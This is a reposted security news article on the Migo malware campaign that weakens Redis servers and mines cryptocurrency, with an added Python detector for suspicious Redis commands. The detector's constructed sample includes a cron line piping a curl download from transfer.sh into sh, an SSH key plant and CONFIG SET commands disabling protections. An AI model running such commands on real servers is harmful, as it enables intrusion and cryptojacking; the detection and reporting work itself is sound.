New cryptocurrency-mining malware targeting Redis servers

admin, 21 February 2024 10:55:54


A novel malware campaign has been observed targeting Redis servers for initial access with the ultimate goal of mining cryptocurrency on compromised Linux hosts.

"This particular campaign involves the use of a number of novel system weakening techniques against the data store itself," Cado security researcher Matt Muir said in a technical report.

The cryptojacking attack is facilitated by a malware codenamed Migo, a Golang ELF binary that comes fitted with compile-time obfuscation and the ability to persist on Linux machines.

The cloud security company said it detected the campaign after it identified an "unusual series of commands" targeting its Redis honeypots; the commands are engineered to lower security defenses by disabling the following configuration options:

  • protected-mode
  • replica-read-only
  • aof-rewrite-incremental-fsync, and
  • rdb-save-incremental-fsync


It's suspected that these options are turned off in order to send additional commands to the Redis server from external networks and facilitate future exploitation without attracting much attention.

This step is then followed by threat actors setting up two Redis keys, one pointing to an attacker-controlled SSH key and the other to a cron job that retrieves the malicious primary payload from a file transfer service named Transfer.sh, a technique previously spotted in early 2023.
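
As an added example (not code from the Cado report or from this article), the following Python detector parses Redis MONITOR output and flags the sequence described above: CONFIG SET commands turning off the four options, and SET commands whose value is shaped like an SSH public key or a cron line that fetches a remote payload. The MONITOR lines are constructed for illustration; the regexes and the `Finding` record are this example's own.

```python
import re
from collections import namedtuple

# Redis MONITOR lines look like:  <unix-ts> [<db> <ip:port>] "CMD" "arg" "arg" ...
MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # one double-quoted, backslash-escaped argument
ESCAPES = {"n": "\n", "r": "\r", "t": "\t"}

# The four options the campaign turns off before sending further commands.
WEAKENING_OPTIONS = {"protected-mode", "replica-read-only",
                     "aof-rewrite-incremental-fsync", "rdb-save-incremental-fsync"}
# Value shapes that suggest a key is being used to plant an SSH key or a payload-fetching cron line.
SSH_KEY_RE = re.compile(r'ssh-(?:rsa|ed25519|dss)\s+[A-Za-z0-9+/=]{20,}')
CRON_FETCH_RE = re.compile(r'^\s*(?:[\d*/,-]+\s+){5}.*\b(?:curl|wget)\b.*https?://', re.I | re.M)
Finding = namedtuple("Finding", "ts client reason")

def parse_args(raw: str) -> list:
    # Split the quoted argument list and undo Redis' backslash escaping (\n, \", \\ ...).
    return [re.sub(r'\\(.)', lambda m: ESCAPES.get(m.group(1), m.group(1)), a)
            for a in ARG_RE.findall(raw)]

def inspect_line(line: str):
    m = MONITOR_RE.match(line.strip())
    args = parse_args(m.group("args")) if m else []
    if not args:
        return None
    cmd, ts, client = args[0].upper(), m.group("ts"), m.group("client")
    if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
        opt, val = args[2].lower(), args[3].lower()
        if opt in WEAKENING_OPTIONS and val == "no":
            return Finding(ts, client, f"disables {opt}")
    elif cmd in ("SET", "SETNX", "APPEND") and len(args) >= 3:
        value = " ".join(args[2:])
        if SSH_KEY_RE.search(value):
            return Finding(ts, client, f"key {args[1]!r} holds SSH public key material")
        if CRON_FETCH_RE.search(value):
            return Finding(ts, client, f"key {args[1]!r} holds a cron line fetching a remote payload")
    return None

def scan(lines) -> list:
    return [f for f in map(inspect_line, lines) if f is not None]

# Constructed MONITOR output mimicking the sequence described above (not a real capture).
SAMPLE_MONITOR = """\
1708500001.000002 [0 198.51.100.7:41022] "CONFIG" "SET" "protected-mode" "no"
1708500001.000003 [0 198.51.100.7:41022] "CONFIG" "SET" "replica-read-only" "no"
1708500001.000004 [0 198.51.100.7:41022] "SET" "ssh_key" "\\n\\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABconstructedKEYmaterial0000== x\\n\\n"
1708500001.000005 [0 198.51.100.7:41022] "SET" "cron" "\\n*/1 * * * * curl -fsSL https://transfer.sh/EXAMPLE/m.sh | sh\\n"
1708500001.000006 [0 10.0.0.3:52210] "CONFIG" "SET" "maxmemory" "2gb"
"""
```

Running `scan(SAMPLE_MONITOR.splitlines())` yields four findings, all from the same client, while the benign `maxmemory` change is ignored.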

The shell script to fetch Migo using Transfer.sh is embedded within a Pastebin file that's, in turn, obtained using a curl or wget command.

The Go-based ELF binary, besides incorporating mechanisms to resist reverse engineering, acts as a downloader for an XMRig installer hosted on GitHub. It's also responsible for performing a series of steps to establish persistence, terminate competing miners, and launch the miner.

On top of that, Migo disables Security-Enhanced Linux (SELinux) and searches for uninstallation scripts for monitoring agents bundled in compute instances from cloud providers such as Qcloud and Alibaba Cloud. It further deploys a modified version ("libsystemd.so") of a popular user-mode rootkit named libprocesshider to hide processes and on-disk artifacts.

It's worth pointing out that these actions overlap with tactics adopted by known cryptojacking groups like TeamTNT, WatchDog, Rocke, and threat actors associated with the SkidMap malware.

"Interestingly, Migo appears to recursively iterate through files and directories under /etc," Muir noted. "The malware will simply read files in these locations and not do anything with the contents."

"One theory is this could be a (weak) attempt to confuse sandbox and dynamic analysis solutions by performing a large number of benign actions, resulting in a non-malicious classification."

Another hypothesis is that the malware is looking for an artifact that's specific to a target environment, although Cado said it found no evidence to support this line of reasoning.

"Migo demonstrates that cloud-focused attackers are continuing to refine their techniques and improve their ability to exploit web-facing services," Muir said.

"Although libprocesshider is frequently used by cryptojacking campaigns, this particular variant includes the ability to hide on-disk artifacts in addition to the malicious processes themselves."

Originally published on the WeChat official account 知机安全: New cryptocurrency-mining malware targeting Redis servers

Posted by admin on 21 February 2024 10:55:54. Please keep this link when reposting (CN-SEC 中文网, with thanks to the original author): http://cn-sec.com/archives/2511638.html
